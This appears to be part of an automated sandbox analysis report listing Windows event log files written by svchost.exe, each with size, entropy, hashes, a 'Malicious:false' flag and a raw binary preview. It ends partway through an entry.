                                                                              Preview:ElfChnk.+.......Z.......+.......Z............[..0]...7n.....................................................................b..%................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................yM......Q7...........P..!5...0..........&...Y9......**..x...Q........Q..^........F..&...............................................................8.......P.....!....nqm......... .Q..^..........................Q........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.0........S.e.cx...**..(...R.......WO..^........F..&...............................................................8.......P.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.512081865341501
                                                                              Encrypted:false
                                                                              SSDEEP:384:Arhl787V7s7y7s7M787/7m7C7p74797kc7h7s7b7Y717c7v7b7v7vV7p73a7k7Z+:Ut/8Hh
                                                                              MD5:50465D28597F69AA4BA1836894D19750
                                                                              SHA1:CC55004E17EAAF1672D0BDAE3A746C40F6AF7593
                                                                              SHA-256:376CBE44BE97D96C93CAB0B83E5480DF2D3EA3CE0169E199BBAC9D7650F4AB93
                                                                              SHA-512:725A9F34A7A98390A365F75B2701E31331C2F3CDD1CF62BABB20C3F5655DC0798469B353E7839E8159DBBE733B58A76DA3ABDAC6E7EE4A4D672CB934AC296F49
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................n...o..-o......................................................................../V............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-(..............E!..s...........&...............................................................-&..........f@..........**..@.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.2719028651564623
                                                                              Encrypted:false
                                                                              SSDEEP:384:/hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauing:/6Ovc0S5UyEeDgLLyfrlB8Q54GJY
                                                                              MD5:104AF6C87B1FA1C965BB2D3CF70EDC8F
                                                                              SHA1:91B208CE7ACC6EDAD1ADC8C5ECBB90000E00CEA2
                                                                              SHA-256:6DB30804B563EE808F78EEC69D3A85FF7F3F0FE551306B5924530C2C0EC2738C
                                                                              SHA-512:90A83431708CD8FBDC9FAD6AF191EDF3E264D8DEB457ABBCCA8941E15DE0DD4E4C2FB2D89B281C2FA11CA5D627010C96EBE3C43B6338DCA27E7701A883F8C295
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........@...............@........... s...t..?h......................................................................._R;................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................w...................._..........**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8167930057519079
                                                                              Encrypted:false
                                                                              SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uyuKtuLujuVgqu:bb+
                                                                              MD5:EBB9255F7BBA5C52CE625D69FE52F60A
                                                                              SHA1:20F226B11EF3A69F56A13A5BF7530E199BFDE310
                                                                              SHA-256:5AB28568919B051FA95E534049B8BA9E606EEF6EAB53EB0ADB71545C0ED2A380
                                                                              SHA-512:D8788F58A8DE7C9BD6F7075DC65606508D14C8AD8AC75E8992174A4D35328E70635AEC36531DA5E81A8DABD931092576C60C5B831C73670D856A40BD2427CB8E
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................"..x$...k.3....................................................................$.#.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................>...........**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.235001208884112
                                                                              Encrypted:false
                                                                              SSDEEP:384:iGhRAEA/sA/8A/gA/lA/KA/EA/DA/ZA/oA/nA//A/PAzyEAuA8AjCbALuAMAKAtZ:J0hVi+KLN61G
                                                                              MD5:50EF6DB57587CF27291B2DED1AD3C542
                                                                              SHA1:ECF5C56F998FCA95BE4BA119DC5E241C693DB891
                                                                              SHA-256:14AD1DF267604F097745CC1A5C2DC6EDFEABF7E89A69A194B5433363A847F530
                                                                              SHA-512:E774A896DA5119D270D59E02DF113CF3E2FC774A24A0A7BDDB39E5D5D614B1F905BAA81FF59790811CAF51B4B92854A06C042D869EA2C52AB19E955E9BB00E4F
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........!...............!...........x.......<......................................................................t..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F....................................................{...........................................f......................................&....j......**...............>............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.1601920702980912
                                                                              Encrypted:false
                                                                              SSDEEP:384:NhwpsWp90Np9b5p9ihp95lp949p9/pp9Wpp9tlp98Jp9jdp9qBp9BJp9A1Z1p9nP:NRZfQI5
                                                                              MD5:1A84D5BFFC6A51A8E813CA9870D46851
                                                                              SHA1:62201D49F347A7BEEA7D58DCB45D173ADBD53887
                                                                              SHA-256:CBF067DCF2548398B87EB882B7A1F26EC7989DBB4D105C4495020D63E9B5E0D8
                                                                              SHA-512:8B3198C3534387FEF8B8120ED0111F6EA02BD21FC3E8C4E74C4936BE18581C80BEF58EB512E111FF0143361E488F1F7C7D3151664E0F4FD996169C894162B24C
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........'...............'..................._.z.......................................................................j.........................................<...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**............................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.0114620219781365
                                                                              Encrypted:false
                                                                              SSDEEP:384:jhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBo:jwDoh1VvpE0Y5RA8sQ
                                                                              MD5:70F943A767EE17A83B03D620404602D6
                                                                              SHA1:26A2A2C8690D3F47D6192DDC29079CA4DE7507A6
                                                                              SHA-256:AAE4D860D5B31157D69935C9A68A8958EF96D9EBB7AB346B8F750E7FD339FBE5
                                                                              SHA-512:88CAB5E94A82F49036C5DC4A3C3DE94BADB9A2244C4A32DAE6A23DFD751553B0FF9953C21B02CA0396D5DBF529C75B57D1A65D9EA86CE86D8D081E63E464D521
                                                                              Malicious:false
                                                                              Preview:ElfChnk.\...............\.............................G......................................................................\O................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..^...........**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.165801171629505
                                                                              Encrypted:false
                                                                              SSDEEP:384:thwCCRzCaCkClCzCYC/CyCVCGCMCvCtlCaf2Ca9CaECaAzCaFECa:tKFD
                                                                              MD5:9236B0363C2E488481D99C2A3B97F664
                                                                              SHA1:7DF4CAC91226C2E2E36DB78D931D4D8386177406
                                                                              SHA-256:968CA40848BDBDDB24126CF3BA1EFE51973835B62A841A13ABBC3F3F76E2AAEC
                                                                              SHA-512:7ADE9B5AE3499BB97FBBCAD1F38F530E9592F4CB4AC3472553A340E0D172704CDD3EA2DE39914F5A2ACB87934037EFDE369AF960256269AC221B5AD9724BE31C
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................04..h6...j........................................................................o................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................v)....../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):88152
                                                                              Entropy (8bit):4.598310163790206
                                                                              Encrypted:false
                                                                              SSDEEP:384:jhyMQyMOIMtMNjhyMQyMOIMtMN6KRKkKGxKTKMKxK2KqMqYvMaDMzMBYxMBYYK1D:j6j6L1FGE53tc60G
                                                                              MD5:13729562AEBB7EAC37D8F6585CBD282E
                                                                              SHA1:65A9FDFBAE5B0494C2051D4CCEEFC56714F5E7DF
                                                                              SHA-256:DBB39377816700D7EC16F25CC60F987225881D555F191A96355DE73047ABA8C8
                                                                              SHA-512:2DEC60BA1E13C3BE4EEE99BDE9C0BC247E9B7C72DC2624190D32952934F1F995FCB6D1D590AE5291DD395C4424FFD5193C462A6B6AD58CB1A776109382445D27
                                                                              Malicious:false
                                                                              Preview:ElfChnk..&.......&.......&.......&...................5......................................................................?.T.........................................F...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**.......&...........^........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.1810965962810462
                                                                              Encrypted:false
                                                                              SSDEEP:384:vhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm7UmLcUmWUmnUm:vY7LU
                                                                              MD5:9D9C182984FF3C8DAFD9D7D27F9461F0
                                                                              SHA1:72E2D06B61F085737906AD835D09009CFD047203
                                                                              SHA-256:C3D5C4AD8C13B39C1EC967B6A9DFCA4ACC94E48C00D1BFAA3BCC5D7B6B134EC2
                                                                              SHA-512:2906BF522ABB70A1E2F3F3DE63C732CCAC103B7F8D54CECF22730ED08A64BA1F6243CBC95EE1F1568ED45B7E608B60303B31B7A67EFDF52778CD239FF41F58E9
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................1..(4.............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................*..........**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):67776
                                                                              Entropy (8bit):0.36718741310867753
                                                                              Encrypted:false
                                                                              SSDEEP:48:M5VWd8acrP+8QNRBEZWTENO4brBT3oWx/6yHVWd8acrP+8QNRBEZWTENO4brBT3j:M+NVaO8JoWx/6yN+NVaO8JoWx/6y
                                                                              MD5:E3B380688C25E192E9393FBFCF5C5A7D
                                                                              SHA1:75168BA35710E5E636ECF826696E0994E43B06FA
                                                                              SHA-256:BCF9CFB550A454F6D71C78A7730057CB1B77B1FC3AF5C4E15E722E405E0FCA85
                                                                              SHA-512:83C6CFC9C5AD2AFD8AC6D3DB57D9F0D51F1EC91F5CD43862CE92D81072A434E94405D5AB0471EC1DB912C5984907AEF12ED3875FB2225264B9F375E5A63AF704
                                                                              Malicious:false
                                                                              Preview:ElfChnk..............................................O........................................................................................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............Ty.r..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.07967961973305
                                                                              Encrypted:false
                                                                              SSDEEP:384:VhIivhiuiMidiyiMi3iEiziXviiqYiMciEiri9iuiLsRi11iWiRmiNiHibifiGiS:VjZvaQKtM9QSp
                                                                              MD5:C0228093C6D68E6BF2A2919C4757E19E
                                                                              SHA1:4C30BEAA7AB56231126956EC83C6B9159B7C7809
                                                                              SHA-256:214406B4B4C04186B2955537F29AC633824792BABF9EE5051B0857CCF9AE2763
                                                                              SHA-512:B0E558BEF4B6A43636B87FDAA598BF8329E15920503ED2460B4D0B251BBB29B9CFAC37D35AC5DB0890A65F80A1F6F6AD85A0613CA36E550E70FE1A4354B2CE9F
                                                                              Malicious:false
                                                                              Preview:ElfChnk.y...............y....................g...i..4........................................................................L..................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F............................................#..............................................................................w#.......'...0..........**......y.......>}.T............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.410222928423883
                                                                              Encrypted:false
                                                                              SSDEEP:768:PsaQLRaDa/anaraLafarananaPara3abavajaXavanajavabaDaTa7afanaraTa/:yL
                                                                              MD5:CBFAA76BF37086B0BF8307043E177AED
                                                                              SHA1:A4878DDD62C8701B59BA3994E1440D746B4F192E
                                                                              SHA-256:B2A0C5CA329AD60E490A75637FAE0E04BD0DE64691C69337E10C00715AC33B99
                                                                              SHA-512:32F527369E7D3938421B7CAE09320C387353A24F05542D0A31E8F4D528F226FD309FB9AD5687A93B5E9164B7E876740F3FBA13CF009BC57FEF3F02507CAC29DE
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........@...............@...............`.....y.......................................................................S.................b...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................;.......................&...........**..H..............`..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.3642612685419924
                                                                              Encrypted:false
                                                                              SSDEEP:384:dhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKH5:dQ0yUkNYwD8imLEUzL/HXxS
                                                                              MD5:727E32931085339B0D59890FD3759197
                                                                              SHA1:1281993447169E4AF0F4EEDE4F70524D766189F6
                                                                              SHA-256:66D8CFCF522ABCC5813640D9315FB0FC1497236FEBAE41E1095547E137759BFD
                                                                              SHA-512:24BF05FA33772320686E4BD6BF32512DD7BE460393304178292B93E7440B7D198A603C9EB45CCED0479A651C5D752B8E688A207B05E180793D41581E3AACE2FC
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................A...D....n........................................................................h................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................C................3..........**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.339319118040676
                                                                              Encrypted:false
                                                                              SSDEEP:384:mh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmomMmqmwmHmLmlm9mGmdmpm3mfmP:mNDcxPuxE9KA
                                                                              MD5:F2254833A2ECFC2BE8343C689060E95C
                                                                              SHA1:4E4CE2B2AE58A6A2EFB7D563F17DCBA59A83D2A7
                                                                              SHA-256:A8B52451086D3042E2353D49E565422A083018D22C89F8447889BA77312DEA65
                                                                              SHA-512:38DB34911D61CA2EFE5767C0344BEFF5D81ECEB09B6F7C1F8BC34F0E6F8DEBBB010471A78AA181D4F43941C91AB5C6DFD1D26970AE766E1E208DA776D4FC5FA5
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................@)...*.........................................................................[=.t................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................................%...........................................&...........**..p.............k...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.7077930323266531
                                                                              Encrypted:false
                                                                              SSDEEP:384:ohK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT2:op
                                                                              MD5:EFAB9CB2241340892CAF25215B175900
                                                                              SHA1:379AAFFC0E9465FBC553A8CD7587F45D07274D24
                                                                              SHA-256:852B282863F4AD8B40A1CB715C9F3EA8B243472EF1D9E95035408AB586EB49BC
                                                                              SHA-512:2702DFE388394AE71F7D2F012E3003F2D3586A5CC2300605D2FF2B14A3F99E4F7443D37203E9EB37101510406C34B6258063807359C31DEDDFE2177ADCB8CBA7
                                                                              Malicious:false
                                                                              Preview:ElfChnk...............................................k.....................................................................O..w................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'.......................................................................................................&...........**...............a............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):112672
                                                                              Entropy (8bit):3.6633400459609597
                                                                              Encrypted:false
                                                                              SSDEEP:384:hdRXQRvuRhJhpRuVRNRFBwRkRZR5FRT3RWQGRhRW0RWCRiCuRGRNRJRWCJRkt+Rz:hPJKvaFTLoJKvaFTLfg
                                                                              MD5:EA9713941DCA7897D75D38DBFAEEA8C1
                                                                              SHA1:A8521CA40033E0EF26AFBC0CE8DDC909C1EF797E
                                                                              SHA-256:AFECA0A2C9EB3724A50865330EA1097E9104448F60336DC6C109FAE02B9DD9AD
                                                                              SHA-512:7EF03BD749ED81EDEAEAD00229091C12D9E74EB65399C9C0AEAE82CBA10D98482FF148873AC908BB3C23DAF78DF55CE02C7F4A5BE9DC86AFDA00265F949CBA3B
                                                                              Malicious:false
                                                                              Preview:ElfChnk...............................................6^........................................................................................................N ....... ..=.......................................h#......................}...3............................ ........... ..............f...h...........?.......................h.......Y.......M.......M...F...........................................f?......................................................A.......A#......................&...............**................z..^...........f?..............................................................<.......T...-.!................@..z..^....#..a_@.[*.pb...............................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l..............*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.269282050125859
                                                                              Encrypted:false
                                                                              SSDEEP:384:Vhghshy2h0hEhDh9vhghp6hXghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLha8:VbsFpkBSqL8wD
                                                                              MD5:A58CC6DEC3C876BEEC16907FC49E19BA
                                                                              SHA1:C2617D099C46BD902D85BD8FE90FC6F34995BA5A
                                                                              SHA-256:BE9A153D8CFAB9F25D94444C14641599D6F8C868DB9675D3FA330E0C7C0110A6
                                                                              SHA-512:4311D7F2C987CCE1F5EE8F78B867A87BFDE8D5E28C996B2BF1347B41063F38B6CB98BE968A962064C5920B9F355AA537FE5370FB78D52C69F5B81B279C394D5D
                                                                              Malicious:false
                                                                              Preview:ElfChnk.............................................b.......................................................................<...........................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a.......................................................................................9...&...........**..@.........................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.2593916356001515
                                                                              Encrypted:false
                                                                              SSDEEP:384:ahOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VVG:ayjbS
                                                                              MD5:14652E4148A13AE019B3CF2CC20B5812
